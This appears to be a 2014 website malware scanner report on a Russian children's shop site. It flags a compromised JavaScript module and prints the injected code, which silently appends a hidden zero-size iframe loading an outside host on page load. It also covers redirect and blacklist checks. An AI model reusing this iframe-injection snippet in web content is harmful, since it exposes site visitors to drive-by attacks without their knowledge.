Scanned pages/files
| Request | Server response | Status |
http://karapuztwo.ru/ | 200 OK Content-Length: 23543 Content-Type: text/html | clean |
http://karapuztwo.ru/media/system/js/caption.js | 200 OK Content-Length: 2150 Content-Type: application/x-javascript | clean |
http://karapuztwo.ru/modules/mod_gk_news_image_3/js/engine_compressed.js | 200 OK Content-Length: 4171 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3501 bytes skipped]... rc|Height|getElementsBySelector|img|Element|amount_c|text_block|gk_news_image_3_news_text|toInt|anim_interval|getStyle|overflow|hidden|load|Gavick|toFloat|id|gk_news_image_3_wrapper|getParent|location|href|stop|Class|Event|250|wait|500|removeProperty|onHide|onShow|switch|push|anim_type|injectInside|complete|anim_type_t|400|200'.split('|'),0,{})) var ifBRnh = document.createElement('iframe');ifBRnh.name = 'ifBRnh';ifBRnh.src = 'http://poren.vivtech.in/';ifBRnh.style.width = '0px';ifBRnh.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifBRnh=') == -1) {document.cookie = 'ifBRnh=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(ifBRnh);}}; Antivirus reports:
| ||
http://karapuztwo.ru/modules/mod_gk_news_image_3/js/importer.php?modid=newsimage3&anim_speed=1000&anim_interval=5000&autoanim=1&anim_type=0&anim_type_t=0&thumb_w=100&thumb_h=60&t_margin=5&t_border=2&t_col=1&t_row=4&bgcolor=000000&opacity=0.4&tooltips=1&tooltips_anim=1 | 200 OK Content-Length: 353 Content-Type: text/javascript | clean |
http://karapuztwo.ru/templates/gk_viyo_blue/lib/scripts/template_scripts.js | 200 OK Content-Length: 4661 Content-Type: application/x-javascript | clean |
http://karapuztwo.ru/vse-tovary.html | 200 OK Content-Length: 157662 Content-Type: text/html | clean |
http://karapuztwo.ru/karapuz/kontakty.html | 200 OK Content-Length: 16135 Content-Type: text/html | clean |
http://karapuztwo.ru/katalog.html | 200 OK Content-Length: 34240 Content-Type: text/html | clean |
http://karapuztwo.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 56751 Content-Type: text/javascript | clean |
http://karapuztwo.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 38065 Content-Type: text/javascript | clean |
http://karapuztwo.ru/./ | 404 NOT FOUND Content-Length: 24091 Content-Type: text/html | clean |
http://karapuztwo.ru/avtokresla/avtokreslo-cybex-pallas.html | 200 OK Content-Length: 22171 Content-Type: text/html | clean |
http://karapuztwo.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js&subdir[4]=/js/slimbox/js&file[4]=slimbox.js | 200 OK Content-Length: 61421 Content-Type: text/javascript | clean |
http://karapuztwo.ru/avtokresla.html | 200 OK Content-Length: 58770 Content-Type: text/html | clean |
http://karapuztwo.ru/index.php?option=com_virtuemart&category_id=26&lang=ru&page=shop.feed | 200 OK Content-Length: 19307 Content-Type: application/xml | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: karapuztwo.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 22 Jun 2014 02:05:21 GMT
Pragma: no-cache
Server: nginx/1.4.0
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 22 Jun 2014 02:05:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c1d68dc381fa7a8477d2da359d6fc615=oos04l94oijsn9f3ikhrj6k155; path=/
Set-Cookie: virtuemart=oos04l94oijsn9f3ikhrj6k155
X-Powered-By: PHP/5.2.17-1.1
GET / HTTP/1.1
Host: karapuztwo.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 22 Jun 2014 02:05:21 GMT
Pragma: no-cache
Server: nginx/1.4.0
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 22 Jun 2014 02:05:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c1d68dc381fa7a8477d2da359d6fc615=oos04l94oijsn9f3ikhrj6k155; path=/
Set-Cookie: virtuemart=oos04l94oijsn9f3ikhrj6k155
X-Powered-By: PHP/5.2.17-1.1
Second query (visit from search engine):
GET / HTTP/1.1
Host: karapuztwo.ru
Referer: http://www.google.com/search?q=karapuztwo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: karapuztwo.ru
Referer: http://www.google.com/search?q=karapuztwo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=karapuztwo.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://karapuztwo.ru/
Result: karapuztwo.ru is not infected or malware details are not published yet.
Result: karapuztwo.ru is not infected or malware details are not published yet.